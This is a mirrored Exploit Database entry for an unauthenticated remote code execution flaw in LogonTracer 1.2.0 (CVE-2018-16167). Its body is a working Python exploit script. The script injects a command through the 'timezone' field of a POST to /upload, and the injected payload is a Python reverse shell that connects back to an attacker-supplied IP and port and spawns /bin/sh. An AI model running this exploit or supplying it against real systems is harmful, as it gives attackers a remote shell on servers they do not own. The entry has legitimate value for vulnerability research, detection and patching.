LogonTracer 1.2.0 – Remote Code Execution (Unauthenticated)

• Exploit Database
• 33 阅读

• 作者： g0ldm45k
  日期： 2021-06-01
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49918/

• # Exploit Title: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)
  # Date: 29/05/2021
  # Exploit Author: g0ldm45k
  # Vendor Homepage: https://www.jpcert.or.jp/
  # Software Link: https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.0
  # Version: 1.2.0 and earlier
  # Tested on: Version 1.2.0 on Debian GNU/Linux 8 (jessie)
  # CVE : CVE-2018-16167
  
  import requests
  import argparse
  
  parser = argparse.ArgumentParser(description='Send a payload to a LogonTracer 1.2.0 (or earlier) server.')
  parser.add_argument('aip', type=str, help='Attacker ip')
  parser.add_argument('aport', type=str, help='Attacker port')
  parser.add_argument('victimurl', type=str, help='Victim URL minus the path.')
  
  args = parser.parse_args()
  
  ATTACKER_IP = args.aip
  ATTACKER_PORT = args.aport
  PAYLOAD = f"python -c 'import pty,socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ATTACKER_IP}\",{ATTACKER_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'"
  
  VICTIM_URL = args.victimurl
  VICTIM_ENDPOINT = "/upload"
  
  DATA = {
  "logtype": "XML",
  "timezone": f"1;{PAYLOAD};",
  }
  
  print("[!] Sending request... If your terminal hangs, you might have a shell!")
  requests.post(f"{VICTIM_URL}{VICTIM_ENDPOINT}", data=DATA)
  print("[*] Done. Did you get what you wanted?")